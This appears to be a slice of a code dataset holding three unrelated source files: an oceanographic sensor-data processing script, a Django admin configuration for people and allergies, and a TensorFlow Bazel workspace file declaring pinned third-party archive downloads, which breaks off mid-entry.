PSU \n \n# mask the complete row (corresponding to time) if one sensore mesurment is nan \n# explaination: there were missing long, lat, and intermitted missing values in measurments, \n# to calculate \nfor d in df: \n mask= np.ones(df[d].shape[0])\n for i in df[d].columns:\n mask= np.zeros(df[d].shape[0])*df[d][i]+mask\n\n for i in df[d].columns:\n df[d][i]=df[d][i]*mask\n \n# calculate variables from measurments \nfor d in df:\n df[d]['sensor_p']= np.zeros(df[d]['wind'].shape[0]) #create wind vector\n df[d]['sensor_p'][:]= 0.5 #sensor depth\n df[d]['density']= gsw.rho(gsw.SA_from_SP(df[d]['salinity'], df[d]['sensor_p'], df[d]['longitude'], df[d]['latitude']), gsw.CT_from_t(df[d]['salinity'], df[d]['sst'], df[d]['sensor_p']), df[d]['sensor_p'])\n #df[d]['dist_covered']= np.zeros(len(df[d]['latitude']))\n df[d]['dist_cov'] = pd.Series(sw.dist(df[d]['latitude'], df[d]['longitude'], units='km')[0],index=df[d].index[1:]) #distance covered between measuemnts \n df[d]['dist_cov'] = df[d]['dist_cov'].replace(0.0, np.nan)\n df[d]['dist_NZ'] = df[d]['dist_cov'].cumsum() #calculate track distance \n df[d]['dist_cov'] = df[d]['dist_cov'].where(df[d]['dist_cov']>0.015)\n df[d]['sensor_p']=np.zeros((df[d]['wind'].shape[0]))# \n df[d]['sensor_p'][:]=0.5 #sensor depth\n df[d]['alpha'] = gsw.alpha(gsw.SA_from_SP(df[d]['salinity'], df[d]['sensor_p'], df[d]['longitude'], df[d]['latitude']), gsw.CT_from_t(df[d]['salinity'], df[d]['sst'], df[d]['sensor_p']), df[d]['sensor_p'])\n df[d]['beta']= gsw.beta(gsw.SA_from_SP(df[d]['salinity'], df[d]['sensor_p'], df[d]['longitude'], df[d]['latitude']), gsw.CT_from_t(df[d]['salinity'], df[d]['sst'], df[d]['sensor_p']), df[d]['sensor_p'])\n\n R=np.abs((df[d]['alpha'][:-1]*np.diff(df[d]['sst']))/(df[d]['beta'][:-1]*np.diff(df[d]['salinity'])))\n df[d]['R'] = pd.Series(R, index=df[d].index[1:])\n \n df[d]['density_grad'] = (np.abs(np.diff(df[d]['density'])))/(df[d]['dist_cov'][1:])\nprint('calculate variables, 5min rolling mean')\n\n#save data as csv\ndf['1020'].to_csv('df1020.csv')\ndf['1022'].to_csv('df1022.csv')\ndf['1023'].to_csv('df1023.csv')\n\n\nprint('csv files saved')","repo_name":"HSR-36/Rosenthal_et_al2023","sub_path":"processing_SD_data.py","file_name":"processing_SD_data.py","file_ext":"py","file_size_in_byte":7351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"15662915490","text":"from django.contrib import admin\nfrom .models import * \n\n# Register your models here.\n\nclass PersonShowInline(admin.StackedInline):\n\tmodel = PersonShow \n\textra = 0 \n\nclass ContactDetailsInline(admin.StackedInline):\n\tmodel = ContactDetail \n\textra = 0\n\n\tfields = (\n\t\t'contact_reference',\n\t\t('email_primary', 'email_secondary'),\n\t\t('mobile_number', 'phone_number'),\n\t\t('post_point', 'building_name', 'building_number'),\n\t\t'street_name',\n\t\t('city', 'region'),\n\t\t('country', 'post_code')\n\t)\n\nclass PersonAdmin(admin.ModelAdmin):\n\tfields = (\n\t\t('site_user', 'person_type'),\n\t\t('forename', 'middle_name', 'surname'),\n\t\t'pronouns',\n\t\t'photo',\n\t\t('medical_info', 'allergies')\n\t)\n\tinlines = [ ContactDetailsInline, PersonShowInline ]\n\n\nadmin.site.register(Person, PersonAdmin)\nadmin.site.register(Allergy)","repo_name":"samozzy/pgp_mis","sub_path":"people/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4014053314","text":"\"\"\"TensorFlow workspace initialization. Consult the WORKSPACE on how to use it.\"\"\"\n\n# Import third party config rules.\nload(\"@bazel_skylib//:workspace.bzl\", \"bazel_skylib_workspace\")\nload(\"@bazel_skylib//lib:versions.bzl\", \"versions\")\nload(\"//third_party/gpus:cuda_configure.bzl\", \"cuda_configure\")\nload(\"//third_party/gpus:rocm_configure.bzl\", \"rocm_configure\")\nload(\"//third_party/tensorrt:tensorrt_configure.bzl\", \"tensorrt_configure\")\nload(\"//third_party/nccl:nccl_configure.bzl\", \"nccl_configure\")\nload(\"//third_party/git:git_configure.bzl\", \"git_configure\")\nload(\"//third_party/py:python_configure.bzl\", \"python_configure\")\nload(\"//third_party/systemlibs:syslibs_configure.bzl\", \"syslibs_configure\")\nload(\"//tensorflow/tools/toolchains:cpus/aarch64/aarch64_compiler_configure.bzl\", \"aarch64_compiler_configure\")\nload(\"//tensorflow/tools/toolchains:cpus/arm/arm_compiler_configure.bzl\", \"arm_compiler_configure\")\nload(\"//tensorflow/tools/toolchains/embedded/arm-linux:arm_linux_toolchain_configure.bzl\", \"arm_linux_toolchain_configure\")\nload(\"//third_party:repo.bzl\", \"tf_http_archive\", \"tf_mirror_urls\")\nload(\"//third_party/clang_toolchain:cc_configure_clang.bzl\", \"cc_download_clang_toolchain\")\nload(\"//tensorflow/tools/def_file_filter:def_file_filter_configure.bzl\", \"def_file_filter_configure\")\nload(\"//third_party/llvm:setup.bzl\", \"llvm_setup\")\n\n# Import third party repository rules. See go/tfbr-thirdparty.\nload(\"//third_party/FP16:workspace.bzl\", FP16 = \"repo\")\nload(\"//third_party/absl:workspace.bzl\", absl = \"repo\")\nload(\"//third_party/benchmark:workspace.bzl\", benchmark = \"repo\")\nload(\"//third_party/dlpack:workspace.bzl\", dlpack = \"repo\")\nload(\"//third_party/ducc:workspace.bzl\", ducc = \"repo\")\nload(\"//third_party/eigen3:workspace.bzl\", eigen3 = \"repo\")\nload(\"//third_party/farmhash:workspace.bzl\", farmhash = \"repo\")\nload(\"//third_party/flatbuffers:workspace.bzl\", flatbuffers = \"repo\")\nload(\"//third_party/gemmlowp:workspace.bzl\", gemmlowp = \"repo\")\nload(\"//third_party/hexagon:workspace.bzl\", hexagon_nn = \"repo\")\nload(\"//third_party/highwayhash:workspace.bzl\", highwayhash = \"repo\")\nload(\"//third_party/hwloc:workspace.bzl\", hwloc = \"repo\")\nload(\"//third_party/implib_so:workspace.bzl\", implib_so = \"repo\")\nload(\"//third_party/icu:workspace.bzl\", icu = \"repo\")\nload(\"//third_party/jpeg:workspace.bzl\", jpeg = \"repo\")\nload(\"//third_party/libprotobuf_mutator:workspace.bzl\", libprotobuf_mutator = \"repo\")\nload(\"//third_party/nasm:workspace.bzl\", nasm = \"repo\")\nload(\"//third_party/py/ml_dtypes:workspace.bzl\", ml_dtypes = \"repo\")\nload(\"//third_party/pybind11_abseil:workspace.bzl\", pybind11_abseil = \"repo\")\nload(\"//third_party/pybind11_bazel:workspace.bzl\", pybind11_bazel = \"repo\")\nload(\"//third_party/opencl_headers:workspace.bzl\", opencl_headers = \"repo\")\nload(\"//third_party/kissfft:workspace.bzl\", kissfft = \"repo\")\nload(\"//third_party/pasta:workspace.bzl\", pasta = \"repo\")\nload(\"//third_party/ruy:workspace.bzl\", ruy = \"repo\")\nload(\"//third_party/sobol_data:workspace.bzl\", sobol_data = \"repo\")\nload(\"//third_party/stablehlo:workspace.bzl\", stablehlo = \"repo\")\nload(\"//third_party/vulkan_headers:workspace.bzl\", vulkan_headers = \"repo\")\nload(\"//third_party/tensorrt:workspace.bzl\", tensorrt = \"repo\")\nload(\"//third_party/triton:workspace.bzl\", triton = \"repo\")\n\n# Import external repository rules.\nload(\"@bazel_tools//tools/build_defs/repo:java.bzl\", \"java_import_external\")\nload(\"@tf_runtime//:dependencies.bzl\", \"tfrt_dependencies\")\nload(\"//tensorflow/tools/toolchains/remote_config:configs.bzl\", \"initialize_rbe_configs\")\nload(\"//tensorflow/tools/toolchains/remote:configure.bzl\", \"remote_execution_configure\")\nload(\"//tensorflow/tools/toolchains/clang6:repo.bzl\", \"clang6_configure\")\nload(\"@rules_jvm_external//:defs.bzl\", \"maven_install\")\n\ndef _initialize_third_party():\n \"\"\" Load third party repositories. See above load() statements. \"\"\"\n FP16()\n absl()\n bazel_skylib_workspace()\n benchmark()\n ducc()\n dlpack()\n eigen3()\n farmhash()\n flatbuffers()\n gemmlowp()\n hexagon_nn()\n highwayhash()\n hwloc()\n icu()\n implib_so()\n jpeg()\n kissfft()\n libprotobuf_mutator()\n ml_dtypes()\n nasm()\n opencl_headers()\n pasta()\n pybind11_abseil()\n pybind11_bazel()\n ruy()\n sobol_data()\n stablehlo()\n vulkan_headers()\n tensorrt()\n triton()\n\n # copybara: tsl vendor\n\n# Toolchains & platforms required by Tensorflow to build.\ndef _tf_toolchains():\n native.register_execution_platforms(\"@local_execution_config_platform//:platform\")\n native.register_toolchains(\"@local_execution_config_python//:py_toolchain\")\n\n # Loads all external repos to configure RBE builds.\n initialize_rbe_configs()\n\n # Note that we check the minimum bazel version in WORKSPACE.\n clang6_configure(name = \"local_config_clang6\")\n cc_download_clang_toolchain(name = \"local_config_download_clang\")\n cuda_configure(name = \"local_config_cuda\")\n tensorrt_configure(name = \"local_config_tensorrt\")\n nccl_configure(name = \"local_config_nccl\")\n git_configure(name = \"local_config_git\")\n syslibs_configure(name = \"local_config_syslibs\")\n python_configure(name = \"local_config_python\")\n rocm_configure(name = \"local_config_rocm\")\n remote_execution_configure(name = \"local_config_remote_execution\")\n\n # For windows bazel build\n # TODO: Remove def file filter when TensorFlow can export symbols properly on Windows.\n def_file_filter_configure(name = \"local_config_def_file_filter\")\n\n # Point //external/local_config_arm_compiler to //external/arm_compiler\n arm_compiler_configure(\n name = \"local_config_arm_compiler\",\n build_file = \"//tensorflow/tools/toolchains/cpus/arm:template.BUILD\",\n remote_config_repo_arm = \"../arm_compiler\",\n remote_config_repo_aarch64 = \"../aarch64_compiler\",\n )\n\n # Load aarch64 toolchain\n aarch64_compiler_configure()\n\n # TFLite crossbuild toolchain for embeddeds Linux\n arm_linux_toolchain_configure(\n name = \"local_config_embedded_arm\",\n build_file = \"//tensorflow/tools/toolchains/embedded/arm-linux:template.BUILD\",\n aarch64_repo = \"../aarch64_linux_toolchain\",\n armhf_repo = \"../armhf_linux_toolchain\",\n )\n\n# Define all external repositories required by TensorFlow\ndef _tf_repositories():\n \"\"\"All external dependencies for TF builds.\"\"\"\n\n # To update any of the dependencies below:\n # a) update URL and strip_prefix to the new git commit hash\n # b) get the sha256 hash of the commit by running:\n # curl -L | sha256sum\n # and update the sha256 with the result.\n # c) TF's automation will then upload the mirrored archive. For more information as well as\n # how to manually upload a mirror if necessary, see go/tf_mirror_md.\n\n # LINT.IfChange\n tf_http_archive(\n name = \"XNNPACK\",\n sha256 = \"ca829b6486d7dcc0a63eae9d5d5be21dcb542e6601af4cada17b9d5f7d5fafb7\",\n strip_prefix = \"XNNPACK-0cbbe74a16e6ca11acf8484ccac85f620336dea4\",\n urls = tf_mirror_urls(\"https://github.com/google/XNNPACK/archive/0cbbe74a16e6ca11acf8484ccac85f620336dea4.zip\"),\n )\n # LINT.ThenChange(//tensorflow/lite/tools/cmake/modules/xnnpack.cmake)\n\n tf_http_archive(\n name = \"FXdiv\",\n sha256 = \"3d7b0e9c4c658a84376a1086126be02f9b7f753caa95e009d9ac38d11da444db\",\n strip_prefix = \"FXdiv-63058eff77e11aa15bf531df5dd34395ec3017c8\",\n urls = tf_mirror_urls(\"https://github.com/Maratyszcza/FXdiv/archive/63058eff77e11aa15bf531df5dd34395ec3017c8.zip\"),\n )\n\n tf_http_archive(\n name = \"pthreadpool\",\n sha256 = \"a4cf06de57bfdf8d7b537c61f1c3071bce74e57524fe053e0bbd2332feca7f95\",\n strip_prefix = \"pthreadpool-4fe0e1e183925bf8cfa6aae24237e724a96479b8\",\n urls = tf_mirror_urls(\"https://github.com/Maratyszcza/pthreadpool/archive/4fe0e1e183925bf8cfa6aae24237e724a96479b8.zip\"),\n )\n\n tf_http_archive(\n name = \"cpuinfo\",\n strip_prefix = \"cpuinfo-ef634603954d88d2643d5809011288b890ac126e\",\n sha256 = \"e07512a11e1c71687359a133f49d60583d7465b737fe5dbe11f461c9aaa72a2b\",\n urls = tf_mirror_urls(\"https://github.com/pytorch/cpuinfo/archive/ef634603954d88d2643d5809011288b890ac126e.zip\"),\n )\n\n tf_http_archive(\n name = \"cudnn_frontend_archive\",\n build_file = \"//third_party:cudnn_frontend.BUILD\",\n patch_file = [\"//third_party:cudnn_frontend_header_fix.patch\"],\n sha256 = \"d8dba9e2607a0c256aa8eacb45b39986ab6f3f24a4d431d4397047a3cb0cd4fb\",\n strip_prefix = \"cudnn-frontend-0.9\",\n urls = tf_mirror_urls(\"https://github.com/NVIDIA/cudnn-frontend/archive/refs/tags/v0.9.zip\"),\n )\n\n tf_http_archive(\n name = \"mkl_dnn_v1\",\n build_file = \"//third_party/mkl_dnn:mkldnn_v1.BUILD\",\n sha256 = \"a50993aa6265b799b040fe745e0010502f9f7103cc53a9525d59646aef006633\",\n strip_prefix = \"oneDNN-2.7.3\",\n urls = tf_mirror_urls(\"https://github.com/oneapi-src/oneDNN/archive/refs/tags/v2.7.3.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"onednn\",\n build_file = \"//third_party/mkl_dnn:mkldnn_v1.BUILD\",\n sha256 = \"8d150a77025f38bff182aaef4dd643625563b2f311c635f86cf4b769b04d7b48\",\n strip_prefix = \"oneDNN-3.3\",\n urls = tf_mirror_urls(\"https://github.com/oneapi-src/oneDNN/archive/refs/tags/v3.3.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"mkl_dnn_acl_compatible\",\n build_file = \"//third_party/mkl_dnn:mkldnn_acl.BUILD\",\n patch_file = [\n \"//third_party/mkl_dnn:onednn_acl_threadcap.patch\",\n \"//third_party/mkl_dnn:onednn_acl_reorder.patch\",\n \"//third_party/mkl_dnn:onednn_acl_thread_local_scheduler.patch\",\n \"//third_party/mkl_dnn:onednn_acl_fp32_bf16_reorder.patch\",\n \"//third_party/mkl_dnn:onednn_acl_bf16_capability_detection_for_ubuntu20.04.patch\",\n ],\n sha256 = \"2f76b407ef8893cca71340f88cd800019a1f14f8ac1bbdbb89a84be1370b52e3\",\n strip_prefix = \"oneDNN-3.2.1\",\n urls = tf_mirror_urls(\"https://github.com/oneapi-src/oneDNN/archive/refs/tags/v3.2.1.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"compute_library\",\n patch_file = [\n \"//third_party/compute_library:compute_library.patch\",\n \"//third_party/compute_library:acl_thread_local_scheduler.patch\",\n ],\n sha256 = \"c4ca329a78da380163b2d86e91ba728349b6f0ee97d66e260a694ef37f0b0d93\",\n strip_prefix = \"ComputeLibrary-23.05.1\",\n urls = tf_mirror_urls(\"https://github.com/ARM-software/ComputeLibrary/archive/v23.05.1.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"arm_compiler\",\n build_file = \"//:arm_compiler.BUILD\",\n sha256 = \"b9e7d50ffd9996ed18900d041d362c99473b382c0ae049b2fce3290632d2656f\",\n strip_prefix = \"rpi-newer-crosstools-eb68350c5c8ec1663b7fe52c742ac4271e3217c5/x64-gcc-6.5.0/arm-rpi-linux-gnueabihf/\",\n urls = tf_mirror_urls(\"https://github.com/rvagg/rpi-newer-crosstools/archive/eb68350c5c8ec1663b7fe52c742ac4271e3217c5.tar.gz\"),\n )\n\n tf_http_archive(\n # This is the latest `aarch64-none-linux-gnu` compiler provided by ARM\n # See https://developer.arm.com/tools-and-software/open-source-software/developer-tools/gnu-toolchain/gnu-a/downloads\n # The archive contains GCC version 9.2.1\n name = \"aarch64_compiler\",\n build_file = \"//:arm_compiler.BUILD\",\n sha256 = \"8dfe681531f0bd04fb9c53cf3c0a3368c616aa85d48938eebe2b516376e06a66\",\n strip_prefix = \"gcc-arm-9.2-2019.12-x86_64-aarch64-none-linux-gnu\",\n urls = tf_mirror_urls(\"https://developer.arm.com/-/media/Files/downloads/gnu-a/9.2-2019.12/binrel/gcc-arm-9.2-2019.12-x86_64-aarch64-none-linux-gnu.tar.xz\"),\n )\n\n tf_http_archive(\n name = \"aarch64_linux_toolchain\",\n build_file = \"//tensorflow/tools/toolchains/embedded/arm-linux:aarch64-linux-toolchain.BUILD\",\n sha256 = \"50cdef6c5baddaa00f60502cc8b59cc11065306ae575ad2f51e412a9b2a90364\",\n strip_prefix = \"arm-gnu-toolchain-11.3.rel1-x86_64-aarch64-none-linux-gnu\",\n urls = tf_mirror_urls(\"https://developer.arm.com/-/media/Files/downloads/gnu/11.3.rel1/binrel/arm-gnu-toolchain-11.3.rel1-x86_64-aarch64-none-linux-gnu.tar.xz\"),\n )\n\n tf_http_archive(\n name = \"armhf_linux_toolchain\",\n build_file = \"//tensorflow/tools/toolchains/embedded/arm-linux:armhf-linux-toolchain.BUILD\",\n sha256 = \"3f76650b1d048036473b16b647b8fd005ffccd1a2869c10994967e0e49f26ac2\",\n strip_prefix = \"arm-gnu-toolchain-11.3.rel1-x86_64-arm-none-linux-gnueabihf\",\n urls = tf_mirror_urls(\"https://developer.arm.com/-/media/Files/downloads/gnu/11.3.rel1/binrel/arm-gnu-toolchain-11.3.rel1-x86_64-arm-none-linux-gnueabihf.tar.xz\"),\n )\n\n tf_http_archive(\n name = \"com_googlesource_code_re2\",\n sha256 = \"ef516fb84824a597c4d5d0d6d330daedb18363b5a99eda87d027e6bdd9cba299\",\n strip_prefix = \"re2-03da4fc0857c285e3a26782f6bc8931c4c950df4\",\n system_build_file = \"//third_party/systemlibs:re2.BUILD\",\n urls = tf_mirror_urls(\"https://github.com/google/re2/archive/03da4fc0857c285e3a26782f6bc8931c4c950df4.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"com_github_google_crc32c\",\n sha256 = \"6b3b1d861bb8307658b2407bc7a4c59e566855ef5368a60b35c893551e4788e9\",\n build_file = \"@com_github_googlecloudplatform_google_cloud_cpp//bazel:crc32c.BUILD\",\n strip_prefix = \"crc32c-1.0.6\",\n urls = tf_mirror_urls(\"https://github.com/google/crc32c/archive/1.0.6.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"com_github_googlecloudplatform_google_cloud_cpp\",\n sha256 = \"ff82045b9491f0d880fc8e5c83fd9542eafb156dcac9ff8c6209ced66ed2a7f0\",\n strip_prefix = \"google-cloud-cpp-1.17.1\",\n repo_mapping = {\n \"@com_github_curl_curl\": \"@curl\",\n \"@com_github_nlohmann_json\": \"@nlohmann_json_lib\",\n },\n system_build_file = \"//third_party/systemlibs:google_cloud_cpp.BUILD\",\n system_link_files = {\n \"//third_party/systemlibs:google_cloud_cpp.google.cloud.bigtable.BUILD\": \"google/cloud/bigtable/BUILD\",\n },\n urls = tf_mirror_urls(\"https://github.com/googleapis/google-cloud-cpp/archive/v1.17.1.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"com_github_googlecloudplatform_tensorflow_gcp_tools\",\n sha256 = \"5e9ebe17eaa2895eb7f77fefbf52deeda7c4b63f5a616916b823eb74f3a0c542\",\n strip_prefix = \"tensorflow-gcp-tools-2643d8caeba6ca2a6a0b46bb123953cb95b7e7d5\",\n urls = tf_mirror_urls(\"https://github.com/GoogleCloudPlatform/tensorflow-gcp-tools/archive/2643d8caeba6ca2a6a0b46bb123953cb95b7e7d5.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"com_google_googleapis\",\n build_file = \"//third_party/googleapis:googleapis.BUILD\",\n sha256 = \"249d83abc5d50bf372c35c49d77f900bff022b2c21eb73aa8da1458b6ac401fc\",\n strip_prefix = \"googleapis-6b3fdcea8bc5398be4e7e9930c693f0ea09316a0\",\n urls = tf_mirror_urls(\"https://github.com/googleapis/googleapis/archive/6b3fdcea8bc5398be4e7e9930c693f0ea09316a0.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"png\",\n build_file = \"//third_party:png.BUILD\",\n patch_file = [\"//third_party:png_fix_rpi.patch\"],\n sha256 = \"a00e9d2f2f664186e4202db9299397f851aea71b36a35e74910b8820e380d441\",\n strip_prefix = \"libpng-1.6.39\",\n system_build_file = \"//third_party/systemlibs:png.BUILD\",\n urls = tf_mirror_urls(\"https://github.com/glennrp/libpng/archive/v1.6.39.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"org_sqlite\",\n build_file = \"//third_party:sqlite.BUILD\",\n sha256 = \"bb5849ae4d7129c09d20596379a0b3f7b1ac59cf9998eba5ef283ea9b6c000a5\",\n strip_prefix = \"sqlite-amalgamation-3430000\",\n system_build_file = \"//third_party/systemlibs:sqlite.BUILD\",\n urls = tf_mirror_urls(\"https://www.sqlite.org/2023/sqlite-amalgamation-3430000.zip\"),\n )\n\n tf_http_archive(\n name = \"gif\",\n build_file = \"//third_party:gif.BUILD\",\n patch_file = [\n \"//third_party:gif_fix_strtok_r.patch\",\n \"//third_party:gif_fix_image_counter.patch\",\n ],\n sha256 = \"31da5562f44c5f15d63340a09a4fd62b48c45620cd302f77a6d9acf0077879bd\",\n strip_prefix = \"giflib-5.2.1\",\n system_build_file = \"//third_party/systemlibs:gif.BUILD\",\n urls = tf_mirror_urls(\"https://pilotfiber.dl.sourceforge.net/project/giflib/giflib-5.2.1.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"six_archive\",\n build_file = \"//third_party:six.BUILD\",\n sha256 = \"1e61c37477a1626458e36f7b1d82aa5c9b094fa4802892072e49de9c60c4c926\",\n strip_prefix = \"six-1.16.0\",\n system_build_file = \"//third_party/systemlibs:six.BUILD\",\n urls = tf_mirror_urls(\"https://pypi.python.org/packages/source/s/six/six-1.16.0.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"absl_py\",\n sha256 = \"a7c51b2a0aa6357a9cbb2d9437e8cd787200531867dc02565218930b6a32166e\",\n strip_prefix = \"abseil-py-1.0.0\",\n system_build_file = \"//third_party/systemlibs:absl_py.BUILD\",\n system_link_files = {\n \"//third_party/systemlibs:absl_py.absl.BUILD\": \"absl/BUILD\",\n \"//third_party/systemlibs:absl_py.absl.flags.BUILD\": \"absl/flags/BUILD\",\n \"//third_party/systemlibs:absl_py.absl.testing.BUILD\": \"absl/testing/BUILD\",\n \"//third_party/systemlibs:absl_py.absl.logging.BUILD\": \"absl/logging/BUILD\",\n },\n urls = tf_mirror_urls(\"https://github.com/abseil/abseil-py/archive/refs/tags/v1.0.0.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"com_google_protobuf\",\n patch_file = [\"//third_party/protobuf:protobuf.patch\"],\n sha256 = \"f66073dee0bc159157b0bd7f502d7d1ee0bc76b3c1eac9836927511bdc4b3fc1\",\n strip_prefix = \"protobuf-3.21.9\",\n system_build_file = \"//third_party/systemlibs:protobuf.BUILD\",\n system_link_files = {\n \"//third_party/systemlibs:protobuf.bzl\": \"protobuf.bzl\",\n \"//third_party/systemlibs:protobuf_deps.bzl\": \"protobuf_deps.bzl\",\n },\n urls = tf_mirror_urls(\"https://github.com/protocolbuffers/protobuf/archive/v3.21.9.zip\"),\n )\n\n tf_http_archive(\n name = \"nsync\",\n patch_file = [\"//third_party:nsync.patch\"],\n sha256 = \"2be9dbfcce417c7abcc2aa6fee351cd4d292518d692577e74a2c6c05b049e442\",\n strip_prefix = \"nsync-1.25.0\",\n system_build_file = \"//third_party/systemlibs:nsync.BUILD\",\n urls = tf_mirror_urls(\"https://github.com/google/nsync/archive/1.25.0.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"com_google_googletest\",\n sha256 = \"81964fe578e9bd7c94dfdb09c8e4d6e6759e19967e397dbea48d1c10e45d0df2\",\n strip_prefix = \"googletest-release-1.12.1\",\n urls = tf_mirror_urls(\"https://github.com/google/googletest/archive/refs/tags/release-1.12.1.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"com_google_fuzztest\",\n sha256 = \"c75f224b34c3c62ee901381fb743f6326f7b91caae0ceb8fe62f3fd36f187627\",\n strip_prefix = \"fuzztest-58b4e7065924f1a284952b84ea827ce35a87e4dc\",\n urls = tf_mirror_urls(\"https://github.com/google/fuzztest/archive/58b4e7065924f1a284952b84ea827ce35a87e4dc.zip\"),\n )\n\n tf_http_archive(\n name = \"com_github_gflags_gflags\",\n sha256 = \"34af2f15cf7367513b352bdcd2493ab14ce43692d2dcd9dfc499492966c64dcf\",\n strip_prefix = \"gflags-2.2.2\",\n urls = tf_mirror_urls(\"https://github.com/gflags/gflags/archive/v2.2.2.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"curl\",\n build_file = \"//third_party:curl.BUILD\",\n sha256 = \"816e41809c043ff285e8c0f06a75a1fa250211bbfb2dc0a037eeef39f1a9e427\",\n strip_prefix = \"curl-8.4.0\",\n system_build_file = \"//third_party/systemlibs:curl.BUILD\",\n urls = tf_mirror_urls(\"https://curl.se/download/curl-8.4.0.tar.gz\"),\n )\n\n # WARNING: make sure ncteisen@ and vpai@ are cc-ed on any CL to change the below rule\n tf_http_archive(\n name = \"com_github_grpc_grpc\",\n sha256 = \"b956598d8cbe168b5ee717b5dafa56563eb5201a947856a6688bbeac9cac4e1f\",\n strip_prefix = \"grpc-b54a5b338637f92bfcf4b0bc05e0f57a5fd8fadd\",\n system_build_file = \"//third_party/systemlibs:grpc.BUILD\",\n patch_file = [\n \"//third_party/grpc:generate_cc_env_fix.patch\",\n \"//third_party/grpc:register_go_toolchain.patch\",\n ],\n system_link_files = {\n \"//third_party/systemlibs:BUILD\": \"bazel/BUILD\",\n \"//third_party/systemlibs:grpc.BUILD\": \"src/compiler/BUILD\",\n \"//third_party/systemlibs:grpc.bazel.grpc_deps.bzl\": \"bazel/grpc_deps.bzl\",\n \"//third_party/systemlibs:grpc.bazel.grpc_extra_deps.bzl\": \"bazel/grpc_extra_deps.bzl\",\n \"//third_party/systemlibs:grpc.bazel.cc_grpc_library.bzl\": \"bazel/cc_grpc_library.bzl\",\n \"//third_party/systemlibs:grpc.bazel.generate_cc.bzl\": \"bazel/generate_cc.bzl\",\n \"//third_party/systemlibs:grpc.bazel.protobuf.bzl\": \"bazel/protobuf.bzl\",\n },\n urls = tf_mirror_urls(\"https://github.com/grpc/grpc/archive/b54a5b338637f92bfcf4b0bc05e0f57a5fd8fadd.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"linenoise\",\n build_file = \"//third_party:linenoise.BUILD\",\n sha256 = \"b35a74dbc9cd2fef9e4d56222761d61daf7e551510e6cd1a86f0789b548d074e\",\n strip_prefix = \"linenoise-4ce393a66b10903a0ef52edf9775ed526a17395f\",\n urls = tf_mirror_urls(\"https://github.com/antirez/linenoise/archive/4ce393a66b10903a0ef52edf9775ed526a17395f.tar.gz\"),\n )\n\n llvm_setup(name = \"llvm-project\")\n\n # Intel openMP that is part of LLVM sources.\n tf_http_archive(\n name = \"llvm_openmp\",\n build_file = \"//third_party/llvm_openmp:BUILD\",\n patch_file = [\"//third_party/llvm_openmp:openmp_switch_default_patch.patch\"],\n sha256 = \"d19f728c8e04fb1e94566c8d76aef50ec926cd2f95ef3bf1e0a5de4909b28b44\",\n strip_prefix = \"openmp-10.0.1.src\",\n urls = tf_mirror_urls(\"https://github.com/llvm/llvm-project/releases/download/llvmorg-10.0.1/openmp-10.0.1.src.tar.xz\"),\n )\n\n tf_http_archive(\n name = \"jsoncpp_git\",\n sha256 = \"f409856e5920c18d0c2fb85276e24ee607d2a09b5e7d5f0a371368903c275da2\",\n strip_prefix = \"jsoncpp-1.9.5\",\n system_build_file = \"//third_party/systemlibs:jsoncpp.BUILD\",\n urls = tf_mirror_urls(\"https://github.com/open-source-parsers/jsoncpp/archive/1.9.5.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"boringssl\",\n sha256 = \"9dc53f851107eaf87b391136d13b815df97ec8f76dadb487b58b2fc45e624d2c\",\n strip_prefix = \"boringssl-c00d7ca810e93780bd0c8ee4eea28f4f2ea4bcdc\",\n system_build_file = \"//third_party/systemlibs:boringssl.BUILD\",\n urls = tf_mirror_urls(\"https://github.com/google/boringssl/archive/c00d7ca810e93780bd0c8ee4eea28f4f2ea4bcdc.tar.gz\"),\n )\n\n # Note: if you update this, you have to update libpng too. See cl/437813808\n tf_http_archive(\n name = \"zlib\",\n build_file = \"//third_party:zlib.BUILD\",\n sha256 = \"b3a24de97a8fdbc835b9833169501030b8977031bcb54b3b3ac13740f846ab30\",\n strip_prefix = \"zlib-1.2.13\",\n system_build_file = \"//third_party/systemlibs:zlib.BUILD\",\n urls = tf_mirror_urls(\"https://zlib.net/fossils/zlib-1.2.13.tar.gz\"),\n )\n\n # LINT.IfChange\n tf_http_archive(\n name = \"fft2d\",\n build_file = \"//third_party/fft2d:fft2d.BUILD\",\n sha256 = \"5f4dabc2ae21e1f537425d58a49cdca1c49ea11db0d6271e2a4b27e9697548eb\",\n strip_prefix = \"OouraFFT-1.0\",\n urls = tf_mirror_urls(\"https://github.com/petewarden/OouraFFT/archive/v1.0.tar.gz\"),\n )\n # LINT.ThenChange(//tensorflow/lite/tools/cmake/modules/fft2d.cmake)\n\n tf_http_archive(\n name = \"snappy\",\n build_file = \"//third_party:snappy.BUILD\",\n sha256 = \"2e458b7017cd58dcf1469ab315389e85e7f445bd035188f2983f81fb19ecfb29\",\n strip_prefix = \"snappy-984b191f0fefdeb17050b42a90b7625999c13b8d\",\n system_build_file = \"//third_party/systemlibs:snappy.BUILD\",\n urls = tf_mirror_urls(\"https://github.com/google/snappy/archive/984b191f0fefdeb17050b42a90b7625999c13b8d.tar.gz\"),\n )\n\n tf_http_archive(\n name = \"nccl_archive\",\n build_file = \"//third_party:nccl/archive.BUILD\",\n patch_file = [\"//third_party/nccl:archive.patch\"],\n sha256 = \"16ac98f3e926c024ce48e10ab220e19ce734adc48c423cfd55ad6f509bd1179f\",\n strip_prefix = \"nccl-2.18.5-1\",\n urls = 